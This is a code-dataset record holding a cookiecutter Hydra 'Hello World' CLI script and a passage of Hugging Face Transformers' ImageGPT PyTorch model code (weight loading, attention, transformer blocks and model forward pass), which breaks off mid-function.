dsproject/{{cookiecutter.project_slug}}/scripts/example.py
|
timothyb0912/cookiecutters
|
dbe386d7e30cd66886562d779ca83a880788337a
|
[
"MIT"
] | 2
|
2021-01-30T17:11:41.000Z
|
2021-03-14T22:54:05.000Z
|
dsproject/{{cookiecutter.project_slug}}/scripts/example.py
|
timothyb0912/cookiecutters
|
dbe386d7e30cd66886562d779ca83a880788337a
|
[
"MIT"
] | null | null | null |
"""
Example CLI for {{cookiecutter.project_name}}.
"""
import hydra
import pyprojroot
from omegaconf import DictConfig
default_config_path = str(pyprojroot.here("configs"))
default_config_name = "config"
@hydra.main(config_path=default_config_path, config_name=default_config_name)
def main(cfg: DictConfig):
"""
Hello world CLI.
Returns True if function exited successfully.
"""
print(f"Hello World!\n Default model is {cfg.model_name_default}")
return True
if __name__ == '__main__':
main()
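# Example invocations (a sketch; assumes configs/config.yaml defines
# model_name_default):
#     python scripts/example.py
#     python scripts/example.py model_name_default=other_model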
| 21.08
| 77
| 0.732448
|
4a18c64a13dd22573f7669e850dd589b1a21b704
| 53,649
|
py
|
Python
|
src/transformers/models/imagegpt/modeling_imagegpt.py
|
JingyaHuang/transformers
|
6589e510fa4e6c442059de2fab84752535de9b23
|
[
"Apache-2.0"
] | null | null | null |
src/transformers/models/imagegpt/modeling_imagegpt.py
|
JingyaHuang/transformers
|
6589e510fa4e6c442059de2fab84752535de9b23
|
[
"Apache-2.0"
] | null | null | null |
src/transformers/models/imagegpt/modeling_imagegpt.py
|
JingyaHuang/transformers
|
6589e510fa4e6c442059de2fab84752535de9b23
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The OpenAI Team Authors and HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch OpenAI ImageGPT model."""
import math
import os
import warnings
from typing import Any, Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from packaging import version
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
if version.parse(torch.__version__) >= version.parse("1.6"):
is_amp_available = True
from torch.cuda.amp import autocast
else:
is_amp_available = False
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
SequenceClassifierOutputWithPast,
)
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import Conv1D, find_pruneable_heads_and_indices, prune_conv1d_layer
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, logging, replace_return_docstrings
from .configuration_imagegpt import ImageGPTConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "openai/imagegpt-small"
_CONFIG_FOR_DOC = "ImageGPTConfig"
_TOKENIZER_FOR_DOC = "ImageGPTTokenizer"
IMAGEGPT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"openai/imagegpt-small",
"openai/imagegpt-medium",
"openai/imagegpt-large",
# See all Image GPT models at https://huggingface.co/models?filter=imagegpt
]
def load_tf_weights_in_imagegpt(model, config, imagegpt_checkpoint_path):
"""
Load tf checkpoints in a pytorch model
"""
try:
import re
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(imagegpt_checkpoint_path)
logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
logger.info("Loading TF weight {} with shape {}".format(name, shape))
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array.squeeze())
for name, array in zip(names, arrays):
name = name[6:] # skip "model/"
name = name.split("/")
        # adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculate m and v
# which are not required for using pretrained model
if any(
n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
for n in name
) or name[-1] in ["_step"]:
logger.info("Skipping {}".format("/".join(name)))
continue
pointer = model
if name[-1] not in ["wtet"]:
pointer = getattr(pointer, "transformer")
for m_name in name:
if re.fullmatch(r"[A-Za-z]+\d+", m_name):
scope_names = re.split(r"(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "w" or scope_names[0] == "g":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "b":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "wpe" or scope_names[0] == "wte":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
elif scope_names[0] in ["q_proj", "k_proj", "v_proj"]:
pointer = getattr(pointer, "c_attn")
pointer = getattr(pointer, "weight")
elif len(name) == 3 and name[1] == "attn" and scope_names[0] == "c_proj":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
elif scope_names[0] == "wtet":
pointer = getattr(pointer, "lm_head")
pointer = getattr(pointer, "weight")
elif scope_names[0] == "sos":
pointer = getattr(pointer, "wte")
pointer = getattr(pointer, "weight")
else:
pointer = getattr(pointer, scope_names[0])
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if len(name) > 1 and name[1] == "attn" or name[-1] == "wtet" or name[-1] == "sos" or name[-1] == "wte":
pass # array is used to initialize only part of the pointer so sizes won't match
else:
try:
assert pointer.shape == array.shape
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
logger.info("Initialize PyTorch weight {}".format(name))
if name[-1] == "q_proj":
pointer.data[:, : config.n_embd] = torch.from_numpy(array.reshape(config.n_embd, config.n_embd)).T
elif name[-1] == "k_proj":
pointer.data[:, config.n_embd : 2 * config.n_embd] = torch.from_numpy(
array.reshape(config.n_embd, config.n_embd)
).T
elif name[-1] == "v_proj":
pointer.data[:, 2 * config.n_embd :] = torch.from_numpy(array.reshape(config.n_embd, config.n_embd)).T
elif len(name) == 3 and name[1] == "attn" and name[2] == "c_proj":
pointer.data = torch.from_numpy(array.reshape(config.n_embd, config.n_embd))
elif name[-1] == "wtet":
pointer.data = torch.from_numpy(array)
elif name[-1] == "wte":
pointer.data[: config.vocab_size - 1, :] = torch.from_numpy(array)
elif name[-1] == "sos":
pointer.data[-1] = torch.from_numpy(array)
else:
pointer.data = torch.from_numpy(array)
return model
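# Name-mapping sketch for the loader above: a TF variable such as
# "model/h0/attn/c_proj/w" is stripped of "model/", split into
# ["h0", "attn", "c_proj", "w"], and walked attribute-by-attribute
# ("h0" -> transformer.h[0], "w" -> "weight") to locate the PyTorch parameter.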
class ImageGPTLayerNorm(nn.Module):
    def __init__(self, hidden_size: int, eps: float = 1e-5):
super().__init__()
self.eps = eps
self.weight = nn.Parameter(torch.Tensor(hidden_size))
    def forward(self, tensor: torch.Tensor) -> torch.Tensor:
# input is not mean centered
return (
tensor
/ torch.sqrt(torch.mean(torch.square(tensor), axis=-1, keepdim=True) + self.eps)
* self.weight.data[..., :]
)
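# ImageGPTLayerNorm is an RMSNorm-style normalization:
# y = x / sqrt(mean(x**2) + eps) * w, with no mean subtraction and no bias,
# unlike standard LayerNorm.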
class ImageGPTAttention(nn.Module):
def __init__(self, config, is_cross_attention: Optional[bool] = False, layer_idx: Optional[int] = None):
super().__init__()
max_positions = config.max_position_embeddings
self.register_buffer(
"bias",
torch.tril(torch.ones((max_positions, max_positions), dtype=torch.uint8)).view(
1, 1, max_positions, max_positions
),
)
self.register_buffer("masked_bias", torch.tensor(-1e4))
self.embed_dim = config.hidden_size
self.num_heads = config.num_attention_heads
self.head_dim = self.embed_dim // self.num_heads
self.split_size = self.embed_dim
if self.head_dim * self.num_heads != self.embed_dim:
raise ValueError(
f"`embed_dim` must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`:"
f" {self.num_heads})."
)
self.scale_attn_weights = config.scale_attn_weights
self.is_cross_attention = is_cross_attention
# Layer-wise attention scaling, reordering, and upcasting
self.scale_attn_by_inverse_layer_idx = config.scale_attn_by_inverse_layer_idx
self.layer_idx = layer_idx
self.reorder_and_upcast_attn = config.reorder_and_upcast_attn
if self.is_cross_attention:
self.c_attn = Conv1D(2 * self.embed_dim, self.embed_dim)
self.q_attn = Conv1D(self.embed_dim, self.embed_dim)
else:
self.c_attn = Conv1D(3 * self.embed_dim, self.embed_dim)
self.c_proj = Conv1D(self.embed_dim, self.embed_dim)
self.attn_dropout = nn.Dropout(config.attn_pdrop)
self.resid_dropout = nn.Dropout(config.resid_pdrop)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(heads, self.num_heads, self.head_dim, self.pruned_heads)
index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])
# Prune conv1d layers
self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)
# Update hyper params
self.split_size = (self.split_size // self.num_heads) * (self.num_heads - len(heads))
self.num_heads = self.num_heads - len(heads)
self.pruned_heads = self.pruned_heads.union(heads)
def _attn(self, query, key, value, attention_mask=None, head_mask=None):
attn_weights = torch.matmul(query, key.transpose(-1, -2))
if self.scale_attn_weights:
attn_weights = attn_weights / (float(value.size(-1)) ** 0.5)
# Layer-wise attention scaling
if self.scale_attn_by_inverse_layer_idx:
attn_weights = attn_weights / float(self.layer_idx + 1)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
attn_weights = torch.where(causal_mask, attn_weights, self.masked_bias.to(attn_weights.dtype))
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
# Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op otherwise
attn_weights = attn_weights.type(value.dtype)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
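    # _attn is scaled dot-product attention: softmax(Q @ K^T / sqrt(d_k)
    # [+ mask]) @ V (scaling subject to the config flags above), with
    # causality enforced by writing masked_bias into future positions.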
def _upcast_and_reordered_attn(self, query, key, value, attention_mask=None, head_mask=None):
# Use `torch.baddbmm` (a bit more efficient w/ alpha param for scaling -- from Megatron-LM)
bsz, num_heads, q_seq_len, dk = query.size()
_, _, k_seq_len, _ = key.size()
# Preallocate attn_weights for `baddbmm`
attn_weights = torch.empty(bsz * num_heads, q_seq_len, k_seq_len, dtype=torch.float32, device=query.device)
# Compute Scale Factor
scale_factor = 1.0
if self.scale_attn_weights:
scale_factor /= float(value.size(-1)) ** 0.5
if self.scale_attn_by_inverse_layer_idx:
scale_factor /= float(self.layer_idx + 1)
# Upcast (turn off autocast) and reorder (Scale K by 1 / root(dk))
if is_amp_available:
with autocast(enabled=False):
q, k = query.reshape(-1, q_seq_len, dk), key.transpose(-1, -2).reshape(-1, dk, k_seq_len)
attn_weights = torch.baddbmm(attn_weights, q.float(), k.float(), beta=0, alpha=scale_factor)
attn_weights = attn_weights.reshape(bsz, num_heads, q_seq_len, k_seq_len)
else:
q, k = query.reshape(-1, q_seq_len, dk), key.transpose(-1, -2).reshape(-1, dk, k_seq_len)
attn_weights = torch.baddbmm(attn_weights, q.float(), k.float(), beta=0, alpha=scale_factor)
attn_weights = attn_weights.reshape(bsz, num_heads, q_seq_len, k_seq_len)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
attn_weights = torch.where(causal_mask, attn_weights, self.masked_bias.to(attn_weights.dtype))
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
        # Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op otherwise
if attn_weights.dtype != torch.float32:
raise RuntimeError("Error with upcasting, attn_weights does not have dtype torch.float32")
attn_weights = attn_weights.type(value.dtype)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
def _split_heads(self, tensor, num_heads, attn_head_size):
"""
Splits hidden_size dim into attn_head_size and num_heads
"""
new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
tensor = tensor.view(*new_shape)
return tensor.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
def _merge_heads(self, tensor, num_heads, attn_head_size):
"""
Merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
tensor = tensor.permute(0, 2, 1, 3).contiguous()
new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
return tensor.view(new_shape)
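    # Shape sketch (illustrative sizes): with batch=2, seq=5, num_heads=8 and
    # head_dim=64, _split_heads maps (2, 5, 512) -> (2, 8, 5, 64) and
    # _merge_heads inverts it back to (2, 5, 512).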
def forward(
self,
hidden_states: torch.Tensor,
        layer_past: Optional[Tuple[torch.Tensor, torch.Tensor]] = None,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = False,
output_attentions: Optional[bool] = False,
) -> tuple:
if encoder_hidden_states is not None:
if not hasattr(self, "q_attn"):
raise ValueError(
"If class is used as cross attention, the weights `q_attn` have to be defined. "
"Please make sure to instantiate class with `ImageGPTAttention(..., is_cross_attention=True)`."
)
query = self.q_attn(hidden_states)
key, value = self.c_attn(encoder_hidden_states).split(self.split_size, dim=2)
attention_mask = encoder_attention_mask
else:
query, key, value = self.c_attn(hidden_states).split(self.split_size, dim=2)
query = self._split_heads(query, self.num_heads, self.head_dim)
key = self._split_heads(key, self.num_heads, self.head_dim)
value = self._split_heads(value, self.num_heads, self.head_dim)
if layer_past is not None:
past_key, past_value = layer_past
key = torch.cat((past_key, key), dim=-2)
value = torch.cat((past_value, value), dim=-2)
if use_cache is True:
present = (key, value)
else:
present = None
if self.reorder_and_upcast_attn:
attn_output, attn_weights = self._upcast_and_reordered_attn(query, key, value, attention_mask, head_mask)
else:
attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask)
attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
attn_output = self.c_proj(attn_output)
attn_output = self.resid_dropout(attn_output)
outputs = (attn_output, present)
if output_attentions:
outputs += (attn_weights,)
return outputs # a, present, (attentions)
class ImageGPTMLP(nn.Module):
def __init__(self, intermediate_size, config):
super().__init__()
embed_dim = config.hidden_size
self.c_fc = Conv1D(intermediate_size, embed_dim)
self.c_proj = Conv1D(embed_dim, intermediate_size)
self.act = ACT2FN[config.activation_function]
self.dropout = nn.Dropout(config.resid_pdrop)
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.c_fc(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.c_proj(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
class ImageGPTBlock(nn.Module):
def __init__(self, config, layer_idx=None):
super().__init__()
hidden_size = config.hidden_size
inner_dim = config.n_inner if config.n_inner is not None else 4 * hidden_size
self.ln_1 = ImageGPTLayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.attn = ImageGPTAttention(config, layer_idx=layer_idx)
self.ln_2 = ImageGPTLayerNorm(hidden_size, eps=config.layer_norm_epsilon)
if config.add_cross_attention:
self.crossattention = ImageGPTAttention(config, is_cross_attention=True, layer_idx=layer_idx)
self.ln_cross_attn = ImageGPTLayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.mlp = ImageGPTMLP(inner_dim, config)
def forward(
self,
hidden_states: torch.Tensor,
        layer_past: Optional[Tuple[torch.Tensor, torch.Tensor]] = None,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = False,
output_attentions: Optional[bool] = False,
) -> tuple:
residual = hidden_states
hidden_states = self.ln_1(hidden_states)
attn_outputs = self.attn(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
attn_output = attn_outputs[0] # output_attn: a, present, (attentions)
outputs = attn_outputs[1:]
# residual connection
hidden_states = attn_output + residual
if encoder_hidden_states is not None:
# add one self-attention block for cross-attention
if not hasattr(self, "crossattention"):
raise ValueError(
f"If `encoder_hidden_states` are passed, {self} has to be instantiated with "
"cross-attention layers by setting `config.add_cross_attention=True`"
)
residual = hidden_states
hidden_states = self.ln_cross_attn(hidden_states)
cross_attn_outputs = self.crossattention(
hidden_states,
attention_mask=attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
)
attn_output = cross_attn_outputs[0]
# residual connection
hidden_states = residual + attn_output
outputs = outputs + cross_attn_outputs[2:] # add cross attentions if we output attention weights
residual = hidden_states
hidden_states = self.ln_2(hidden_states)
feed_forward_hidden_states = self.mlp(hidden_states)
# residual connection
hidden_states = residual + feed_forward_hidden_states
outputs = (hidden_states,) + (outputs if use_cache else outputs[1:])
return outputs # hidden_states, present, (attentions, cross_attentions)
class ImageGPTPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = ImageGPTConfig
load_tf_weights = load_tf_weights_in_imagegpt
base_model_prefix = "transformer"
main_input_name = "input_ids"
supports_gradient_checkpointing = True
def __init__(self, *inputs, **kwargs):
super().__init__(*inputs, **kwargs)
def _init_weights(self, module):
"""Initialize the weights."""
if isinstance(module, (nn.Linear, Conv1D)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, ImageGPTLayerNorm):
module.weight.data.fill_(1.0)
# Reinitialize selected weights subject to the OpenAI GPT-2 Paper Scheme:
# > A modified initialization which accounts for the accumulation on the residual path with model depth. Scale
# > the weights of residual layers at initialization by a factor of 1/√N where N is the # of residual layers.
# > -- GPT-2 :: https://openai.com/blog/better-language-models/
#
# Reference (Megatron-LM): https://github.com/NVIDIA/Megatron-LM/blob/main/megatron/model/gpt_model.py
for name, p in module.named_parameters():
if "c_proj" in name and "weight" in name:
# Special Scaled Initialization --> There are 2 Layer Norms per Transformer Block
p.data.normal_(mean=0.0, std=(self.config.initializer_range / math.sqrt(2 * self.config.n_layer)))
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, ImageGPTModel):
module.gradient_checkpointing = value
IMAGEGPT_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
    library implements for all its models (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
    Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matters related to general usage
and behavior.
Parameters:
config ([`ImageGPTConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
IMAGEGPT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
`input_ids_length` = `sequence_length` if `past_key_values` is `None` else
`past_key_values[0][0].shape[-2]` (`sequence_length` of input past key value states). Indices of input
sequence tokens in the vocabulary.
If `past_key_values` is used, only `input_ids` that do not have their past calculated should be passed as
`input_ids`.
Indices can be obtained using [`ImageGPTFeatureExtractor`]. See [`ImageGPTFeatureExtractor.__call__`] for
details.
past_key_values (`Tuple[Tuple[torch.Tensor]]` of length `config.n_layers`):
Contains precomputed hidden-states (key and values in the attention blocks) as computed by the model (see
`past_key_values` output below). Can be used to speed up sequential decoding. The `input_ids` which have
their past given to this model should not be passed as `input_ids` as they have already been computed.
attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
If `past_key_values` is used, optionally only the last `inputs_embeds` have to be input (see
`past_key_values`).
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`).
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare ImageGPT Model transformer outputting raw hidden-states without any specific head on top.",
IMAGEGPT_START_DOCSTRING,
)
class ImageGPTModel(ImageGPTPreTrainedModel):
_keys_to_ignore_on_load_missing = ["attn.masked_bias"]
def __init__(self, config: ImageGPTConfig):
super().__init__(config)
self.embed_dim = config.hidden_size
self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
self.drop = nn.Dropout(config.embd_pdrop)
self.h = nn.ModuleList([ImageGPTBlock(config, layer_idx=i) for i in range(config.num_hidden_layers)])
self.ln_f = ImageGPTLayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
# Model parallel
self.model_parallel = False
self.device_map = None
self.gradient_checkpointing = False
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
"""
for layer, heads in heads_to_prune.items():
self.h[layer].attn.prune_heads(heads)
@add_start_docstrings_to_model_forward(IMAGEGPT_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=BaseModelOutputWithPastAndCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs: Any,
) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
            `labels = input_ids`. Indices are selected in `[-100, 0, ..., config.vocab_size]`. All labels set to `-100`
            are ignored (masked); the loss is only computed for labels in `[0, ..., config.vocab_size]`.
Returns:
Examples:
```python
>>> from transformers import ImageGPTFeatureExtractor, ImageGPTModel
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = ImageGPTFeatureExtractor.from_pretrained("openai/imagegpt-small")
>>> model = ImageGPTModel.from_pretrained("openai/imagegpt-small")
>>> inputs = feature_extractor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
```"""
if "pixel_values" in kwargs:
warnings.warn(
"The `pixel_values` argument is deprecated and will be removed in a future version, use `input_ids`"
" instead.",
FutureWarning,
)
if input_ids is not None:
raise ValueError(
"You cannot pass both `pixel_values` and `input_ids`. Please make sure to only pass `input_ids`."
)
input_ids = kwargs.pop("pixel_values")
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
batch_size = input_ids.shape[0]
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size = inputs_embeds.shape[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past_key_values is None:
past_length = 0
past_key_values = tuple([None] * len(self.h))
else:
past_length = past_key_values[0][0].size(-2)
if position_ids is None:
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# ImageGPTAttention mask.
if attention_mask is not None:
if batch_size <= 0:
raise ValueError("batch_size has to be defined and > 0")
attention_mask = attention_mask.view(batch_size, -1)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
attention_mask = attention_mask[:, None, None, :]
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility
attention_mask = (1.0 - attention_mask) * -10000.0
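            # e.g. a mask [1, 1, 0] becomes [0.0, 0.0, -10000.0]; added to the
            # attention logits, softmax then gives ~zero weight to the pad slot.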
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.add_cross_attention and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# head_mask has shape n_layer x batch x n_heads x N x N
head_mask = self.get_head_mask(head_mask, self.config.n_layer)
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
position_embeds = self.wpe(position_ids)
hidden_states = inputs_embeds + position_embeds
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
hidden_states = hidden_states + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
presents = () if use_cache else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
all_hidden_states = () if output_hidden_states else None
for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
# Model parallel
if self.model_parallel:
torch.cuda.set_device(hidden_states.device)
# Ensure layer_past is on same device as hidden_states (might not be correct)
if layer_past is not None:
layer_past = tuple(past_state.to(hidden_states.device) for past_state in layer_past)
# Ensure that attention_mask is always on the same device as hidden_states
if attention_mask is not None:
attention_mask = attention_mask.to(hidden_states.device)
if isinstance(head_mask, torch.Tensor):
head_mask = head_mask.to(hidden_states.device)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if self.gradient_checkpointing and self.training:
if use_cache:
logger.warning(
"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, use_cache, output_attentions)
return custom_forward
